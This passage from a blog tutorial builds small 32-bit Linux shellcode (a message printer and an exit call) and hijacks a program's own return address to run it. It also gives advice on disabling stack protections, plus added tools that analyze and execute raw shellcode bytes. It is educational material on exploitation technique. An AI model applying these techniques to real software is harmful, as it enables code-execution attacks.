<span style="color: #1060b6;"> movl $0x7,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">"</span>Run Han<span style="color: maroon;">"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><b>Explanation:</b></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">Use a <i><b>relative jmp/call </b></i>pair to accomplish this job.</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;">1. We first use a relative jump to reach the call instruction.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;">2. Next, the relative call transfers the execution flow to label 1.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><br />
</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;">So what do these steps have to do with the address of the message?</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;">This is a tricky trick.<i><b> When you call a function, the CPU automatically pushes the return address (eip) onto the stack.</b></i> Look at what sits right after the call instruction: it is the message. So the CPU pushes the address of the message onto the stack for us, and the popl %esi at label 1 retrieves it without the code ever needing to know its absolute address.</span></div><br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">And now let's compile the file, and test the output.</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">It works.</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">The next step is much easier than the above: all I have to do is dump the file with objdump and copy the machine-code bytes of the inline assembly into the shell code string.</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">print_shell.c</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"></span></div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">char</span> shellcode<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xeb</span><span style="color: #0f69ff;">\x20</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x5e</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x04</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xbb</span><span style="color: #0f69ff;">\x01</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xba</span><span style="color: #0f69ff;">\x07</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xf1</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x01</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xbb</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xe8</span><span style="color: #0f69ff;">\xdb</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">Run Han</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span>ptr<span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> i<span style="color: #406080;">;</span>
<span style="color: #595979;">/*</span>
<span style="color: #595979;"> *overflow the return address.</span>
<span style="color: #595979;"> *transfer the execution flow to shellcode.</span>
<span style="color: #595979;"> */</span>
<span style="color: #200080; font-weight: bold;">for</span><span style="color: #308080;">(</span>i<span style="color: #308080;">=</span><span style="color: #008c00;">0</span><span style="color: #406080;">;</span>i<span style="color: #308080;"><</span><span style="color: #008c00;">10</span><span style="color: #406080;">;</span>i<span style="color: #308080;">+</span><span style="color: #308080;">+</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
ptr <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">*</span><span style="color: #308080;">)</span><span style="color: #308080;">&</span>ptr<span style="color: #308080;">+</span>i<span style="color: #406080;">;</span>
<span style="color: #308080;">*</span><span style="color: #308080;">(</span>ptr<span style="color: #308080;">)</span> <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">)</span>shellcode<span style="color: #406080;">;</span>
<span style="color: #406080;">}</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">compile the program and don't forget to use the execstack command to enable the executable stack.</span></span><br />
<span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">demo video:</span></span><br />
<a href="http://www.youtube.com/watch?v=WpfShXa1iEk"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;">http://www.youtube.com/watch?v=WpfShXa1iEk</span></span></a></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></span></div><br />
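<div>Added example (my own code, not from the post): the analysis a defender does on a captured blob like the shellcode[] in print_shell.c. It decodes just the handful of i386 opcodes these posts use, computes where the jmp and the call land, flags the jmp-forward / call-backward / pop triple (the position-independent "getpc" idiom the Explanation section describes) and lists each int $0x80 with the %eax value in force, which is the same reading of eax=4 (print) and eax=1 (exit) given in the Background Knowledge section. It confirms the byte counts written beside print_2.c: the jmp skips 0x20 = 32 bytes and the call goes back 37 = 32 + 5 bytes. The same walk also handles the exit-only blob from the Shell code 2 post further down this feed. The struct, the function names and the opcode subset are assumptions of this example.</div>

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The print shellcode from print_shell.c above, byte for byte. */
static const unsigned char print_shellcode[] =
    "\xeb\x20"                    /* jmp  2f          */
    "\x5e"                        /* 1: popl %esi     */
    "\xb8\x04\x00\x00\x00"        /* movl $4,%eax     */
    "\xbb\x01\x00\x00\x00"        /* movl $1,%ebx     */
    "\xba\x07\x00\x00\x00"        /* movl $7,%edx     */
    "\x89\xf1"                    /* movl %esi,%ecx   */
    "\xcd\x80"                    /* int  $0x80       */
    "\xb8\x01\x00\x00\x00"        /* movl $1,%eax     */
    "\xbb\x00\x00\x00\x00"        /* movl $0,%ebx     */
    "\xcd\x80"                    /* int  $0x80       */
    "\xe8\xdb\xff\xff\xff"        /* 2: call 1b       */
    "Run Han";                    /* the message      */

/* The exit-only shellcode from the "Shell code 2" post, for comparison. */
static const unsigned char exit_shellcode[] =
    "\xb8\x01\x00\x00\x00" "\xbb\x00\x00\x00\x00" "\xcd\x80";

struct blob_info {
    int jmp_target;      /* where the forward short jmp lands, -1 if none   */
    int call_target;     /* where the backward call lands, -1 if none       */
    int data_offset;     /* first byte after the call: the embedded data    */
    int getpc_idiom;     /* 1 if the call lands on a pop (jmp/call/pop)     */
    int syscalls[8];     /* %eax at each int $0x80, in order                */
    int nsyscalls;
};

static int32_t rd_le32(const unsigned char *p)
{
    uint32_t v = (uint32_t)p[0] | ((uint32_t)p[1] << 8)
               | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    return (int32_t)v;
}

/* Linear walk with a decoder for just the opcodes these posts use.
 * Returns the number of instructions decoded, or -1 on an unknown opcode.
 * The walk stops after a call, because what follows it is data. */
int analyze_shellcode(const unsigned char *code, size_t len, struct blob_info *out)
{
    size_t pc = 0;
    int count = 0, eax = -1;

    memset(out, 0, sizeof *out);
    out->jmp_target = out->call_target = out->data_offset = -1;

    while (pc < len) {
        unsigned char op = code[pc];
        if (op == 0xeb && pc + 2 <= len) {                 /* jmp rel8 */
            out->jmp_target = (int)pc + 2 + (int8_t)code[pc + 1];
            pc += 2;
        } else if (op == 0xe8 && pc + 5 <= len) {          /* call rel32 */
            out->call_target = (int)pc + 5 + rd_le32(code + pc + 1);
            out->data_offset = (int)pc + 5;
            if (out->call_target >= 0 && (size_t)out->call_target < len
                && (code[out->call_target] & 0xf8) == 0x58)  /* pop r32 */
                out->getpc_idiom = 1;
            return count + 1;
        } else if ((op & 0xf8) == 0x58) {                  /* pop r32 */
            pc += 1;
        } else if ((op & 0xf8) == 0xb8 && pc + 5 <= len) { /* mov imm32,r32 */
            if (op == 0xb8)
                eax = rd_le32(code + pc + 1);
            pc += 5;
        } else if (op == 0x89 && pc + 2 <= len && (code[pc + 1] & 0xc0) == 0xc0) {
            pc += 2;                                       /* mov r32,r32 */
        } else if (op == 0xcd && pc + 2 <= len && code[pc + 1] == 0x80) {
            if (out->nsyscalls < 8)                        /* int $0x80 */
                out->syscalls[out->nsyscalls++] = eax;
            pc += 2;
        } else {
            return -1;
        }
        count++;
    }
    return count;
}

/* Names for the two syscall numbers the posts use. */
const char *syscall_name(int n)
{
    return n == 1 ? "exit" : n == 4 ? "write" : "unknown";
}

static void report(const char *name, const unsigned char *code, size_t len)
{
    struct blob_info info;
    int n = analyze_shellcode(code, len, &info);
    printf("%s: %d instructions, jmp->%d, call->%d, data@%d, getpc idiom: %s\n",
           name, n, info.jmp_target, info.call_target, info.data_offset,
           info.getpc_idiom ? "yes" : "no");
    for (int i = 0; i < info.nsyscalls; i++)
        printf("  int $0x80 with eax=%d (%s)\n", info.syscalls[i], syscall_name(info.syscalls[i]));
    if (info.data_offset >= 0)
        printf("  bytes after the call: \"%s\"\n", (const char *)code + info.data_offset);
}

int main(void)
{
    report("print_shell.c", print_shellcode, sizeof print_shellcode - 1);
    report("exit_shell.c", exit_shellcode, sizeof exit_shellcode - 1);
    return 0;
}
```

<div>The walk deliberately stops at the call, since everything after it is data rather than code; a real triage would hand the remainder to a full disassembler. The jmp-forward, call-backward, pop triple that getpc_idiom reports is exactly the byte pattern that static scanners key on when flagging position-independent payloads in captured input.</div>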
<br />
</div>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-71072057833026713042011-06-29T09:43:00.000-07:002011-11-02T06:57:38.673-07:00Shell code 2 (cont.)After the previous article, I wrote a program which uses a shell code to exit normally.<br />
However, there is a simpler way to accomplish this job: we can use a Linux system call.<br />
<br />
In Linux, when you want to make a system call from assembly, just use int $0x80.<br />
The system call number is stored in %eax, and the parameters of the system call are stored in %ebx, %ecx and so on.<br />
<br />
OK, it's time to use this information and write it into shell code.<br />
<br />
First, write a normal program that uses inline assembly.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">exit.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: black; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: maroon; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #808030;">(</span><span style="color: #808030;">)</span><span style="color: purple;">{</span>
__asm__<span style="color: #808030;">(</span><span style="color: maroon;">"</span><span style="color: #0000e6;">movl $1, </span><span style="color: #0f69ff;">%e</span><span style="color: #0000e6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #0000e6;"></span>
<span style="color: #0000e6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #0000e6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #0000e6;"></span>
<span style="color: #0000e6;"> int $0x80;</span><span style="color: maroon;">"</span><span style="color: #808030;">)</span><span style="color: purple;">;</span>
<span style="color: maroon; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: purple;">;</span>
<span style="color: purple;">}</span></pre><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;">and now compile it with the following command.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">gcc -static -g -o exit.out exit.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">objdump -d exit.out >> dump.txt</span><br />
<div style="font-family: inherit;"><span class="Apple-style-span">The main function in dump.txt:</span></div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"></span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: black; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">080482c0 <span style="color: #808030;"><</span>main<span style="color: #808030;">></span><span style="color: #808030;">:</span>
<span style="color: #e34adc;"> 80482c0:</span> <span style="color: #008c00;">55</span> <span style="color: maroon; font-weight: bold;">push</span> <span style="color: #808030;">%</span><span style="color: navy;">ebp</span>
<span style="color: #e34adc;"> 80482c1:</span> <span style="color: #008c00;">89</span> <span style="color: #38761d;">e5</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">%</span><span style="color: navy;">esp</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span>
<span style="color: #e34adc;"> 80482c3:</span> <span style="color: #38761d;">b8</span> <span style="color: #008c00;">01</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x1</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: #e34adc;"> 80482c8:</span> <span style="color: #38761d;">bb</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x0</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">ebx</span>
<span style="color: #e34adc;"> 80482cd:</span> <span style="color: #38761d;">cd</span> <span style="color: #008c00;">80</span> <span style="color: maroon; font-weight: bold;">int</span> $<span style="color: green;">0x80</span>
<span style="color: #e34adc;"> 80482cf:</span> <span style="color: #38761d;">b8</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: #008c00;">00</span> <span style="color: maroon; font-weight: bold;">mov</span> $<span style="color: green;">0x0</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">eax</span>
<span style="color: #e34adc;"> 80482d4:</span> <span style="color: #008c00;">5d</span> <span style="color: maroon; font-weight: bold;">pop</span> <span style="color: #808030;">%</span><span style="color: navy;">ebp</span>
<span style="color: #e34adc;"> 80482d5:</span> <span style="color: #38761d;">c3</span> <span style="color: maroon; font-weight: bold;">ret</span></pre>The machine-code bytes in the middle column are what we need. The prologue (push/mov), the final mov $0x0,%eax and the epilogue (pop/ret) are only the compiler's scaffolding around the three instructions that actually make the exit(0) system call: mov $0x1,%eax (syscall number 1), mov $0x0,%ebx (exit status) and int $0x80.<br />
Let's turn those bytes into a shellcode string.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">exit_shell.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"></span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: black; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">/* 32-bit Linux exit(0): mov $1,%eax ; mov $0,%ebx ; int $0x80 */
char shellcode[]=
"\xb8\x01\x00\x00\x00"
"\xbb\x00\x00\x00\x00"
"\xcd\x80";
int main(){
    int *ptr;
    int i;
    /* Walk upward from ptr's own stack slot, across the saved %ebp and the
       return address, writing the address of shellcode into every word. */
    for(i=0;i&lt;10;i++){
        ptr = (int*)&amp;ptr+i;
        *(ptr) = (int)shellcode;
    }
    return 0;
}</pre><div style="font-family: inherit;"><span class="Apple-style-span">P.S. The for loop deliberately overflows the return address so that execution is transferred to the shellcode when main returns.</span></div>Compile it with the following, and remember to run execstack to mark the stack executable. Note that the shellcode array itself lives in .data, not on the stack; execstack still does the job here because on 32-bit x86 Linux a binary that asks for an executable stack is run with read-implies-exec, which makes every readable mapping, .data included, executable. If your gcc turns on -fstack-protector by default, add -fno-stack-protector as well, otherwise the canary check aborts the program before ret is reached.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">gcc -static -g -o exit_shell.out exit_shell.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execstack -s exit_shell.out</span><br />
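As an added example (not code from the original post), the C program below automates what was just done by hand: it pulls the instruction bytes out of objdump lines like the ones above, prints them in the "\x.." form used in exit_shell.c, counts the NUL bytes (which matter as soon as a payload has to survive a strcpy-style copy), and on x86 Linux runs the bytes in a forked child from an mmap'd RWX page, so the same shellcode can be tested without execstack or the return-address overwrite. The three listing lines are copied from the disassembly above; the function names and buffer sizes are this example's own.

```c
/* Added example, not from the original post: pull the exit(0) bytes out of an objdump
 * listing, print them in the "\x.." form exit_shell.c uses, count NUL bytes, and
 * (x86 Linux only) execute them in a child process from an RWX page. */
#define _GNU_SOURCE
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/wait.h>

/* The three listing lines the post keeps, copied from the objdump output above.
 * objdump prints "address:<tab>byte byte ...<tab>mnemonic operands". */
static const char *listing[] = {
    " 80482c3:\tb8 01 00 00 00       \tmov    $0x1,%eax",
    " 80482c8:\tbb 00 00 00 00       \tmov    $0x0,%ebx",
    " 80482cd:\tcd 80                \tint    $0x80",
};

/* Parse one listing line: skip the "address:" column, then take every token that is
 * exactly two hex digits until the mnemonic column. Returns the bytes appended. */
static size_t parse_line(const char *line, unsigned char *out, size_t cap) {
    const char *p = strchr(line, ':');
    size_t n = 0;
    if (p == NULL) return 0;
    for (p++; n < cap; p += 2) {
        while (*p == ' ' || *p == '\t') p++;
        /* "add", "dec" and similar mnemonics start with hex digits but have a third
         * alphanumeric character, so they end the byte column instead of being eaten. */
        if (!isxdigit((unsigned char)p[0]) || !isxdigit((unsigned char)p[1]) ||
            isalnum((unsigned char)p[2]))
            break;
        char hex[3] = { p[0], p[1], '\0' };
        out[n++] = (unsigned char)strtoul(hex, NULL, 16);
    }
    return n;
}

/* Concatenate the bytes of several listing lines. */
static size_t shellcode_from_listing(const char **lines, size_t nlines,
                                     unsigned char *out, size_t cap) {
    size_t n = 0;
    for (size_t i = 0; i < nlines && n < cap; i++)
        n += parse_line(lines[i], out + n, cap - n);
    return n;
}

/* Render the bytes as the string literal used for char shellcode[] in exit_shell.c. */
static void to_c_string(const unsigned char *b, size_t n, char *out, size_t cap) {
    size_t pos = 0;
    if (cap < 3) { if (cap) out[0] = '\0'; return; }
    out[pos++] = '"';
    for (size_t i = 0; i < n && pos + 6 <= cap; i++)   /* 4 chars per byte, then quote + NUL */
        pos += (size_t)snprintf(out + pos, cap - pos, "\\x%02x", b[i]);
    out[pos++] = '"';
    out[pos] = '\0';
}

/* NUL bytes are the usual reason a shellcode stops working once it is delivered through
 * a strcpy()/sprintf()-style copy: the copy ends at the first 0x00. */
static size_t count_nul(const unsigned char *b, size_t n) {
    size_t c = 0;
    for (size_t i = 0; i < n; i++) c += (b[i] == 0);
    return c;
}

/* Run the bytes in a forked child from a fresh RWX page: no execstack needed, and a
 * crash cannot take the parent down. Returns the child's exit status, 128+signal if it
 * crashed, or -1 where it cannot run (i386 code using int $0x80: x86 Linux only). */
static int run_in_child(const unsigned char *b, size_t n) {
#if defined(__linux__) && (defined(__i386__) || defined(__x86_64__))
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20   /* Linux x86 value, in case a strict -std hid the macro */
#endif
    size_t pagesz = (size_t)sysconf(_SC_PAGESIZE);
    if (n > pagesz) return -1;
    void *page = mmap(NULL, pagesz, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return -1;
    memcpy(page, b, n);
    pid_t pid = fork();
    if (pid < 0) { munmap(page, pagesz); return -1; }
    if (pid == 0) {
        ((void (*)(void))page)();
        _exit(99);            /* only reached if the shellcode returned instead of exiting */
    }
    int status = 0;
    waitpid(pid, &status, 0);
    munmap(page, pagesz);
    if (WIFEXITED(status)) return WEXITSTATUS(status);
    if (WIFSIGNALED(status)) return 128 + WTERMSIG(status);
    return -1;
#else
    (void)b; (void)n;
    return -1;
#endif
}

int main(void) {
    unsigned char sc[64];
    char str[256];
    size_t n = shellcode_from_listing(listing, sizeof listing / sizeof listing[0], sc, sizeof sc);
    to_c_string(sc, n, str, sizeof str);
    printf("%zu bytes, %zu of them NUL\nchar shellcode[] = %s;\n", n, count_nul(sc, n), str);
    /* 0 when the kernel accepted the int $0x80 exit(0); 128+signal when it refused it */
    printf("child exit status: %d\n", run_in_child(sc, n));
    return 0;
}
```

The parser stops at the first token that is not exactly two hex digits, so it also copes with longer objdump lines where several bytes precede the mnemonic. For this listing it yields 12 bytes, 7 of them NUL, which is why this exact string could not be delivered through a C string copy; the child exit status is 0 on an x86 Linux kernel that accepts int $0x80 (a 64-bit kernel built without 32-bit emulation reports 139, i.e. SIGSEGV).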
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><b>Result:</b></span><br />
<span class="Apple-style-span" style="font-family: inherit;">Now use gdb to verify this: break on the ret of main, single-step over it and see where execution lands.</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: black; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #808030;">(</span>gdb<span style="color: #808030;">)</span> disassem main
Dump of assembler <span style="color: #004a43;">code</span> <span style="color: #004a43;">for</span> function main<span style="color: #808030;">:</span>
<span style="color: green;">0x080482c0</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+0</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">push</span> <span style="color: #808030;">%</span><span style="color: navy;">ebp</span>
<span style="color: green;">0x080482c1</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+1</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">mov</span> <span style="color: #808030;">%</span><span style="color: navy;">esp</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span>
<span style="color: green;">0x080482c3</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+3</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> <span style="color: maroon; font-weight: bold;">sub</span> $<span style="color: green;">0x10</span><span style="color: #808030;">,</span><span style="color: #808030;">%</span><span style="color: navy;">esp</span>
<span style="color: green;">0x080482c6</span> <span style="color: #808030;"><</span><span style="color: #008c00;">+6</span><span style="color: #808030;">></span><span style="color: #808030;">:</span> movl $<span style="color: green;">0x0</span><span style="color: #808030;">,</span><span style="color: #808030;">-</span><span style="color: green;">0x8</span><span style="color: #808030;">(</span><span style="color: #808030;">%</span><span style="color: navy;">ebp</span><span style="color: #808030;">)</span>
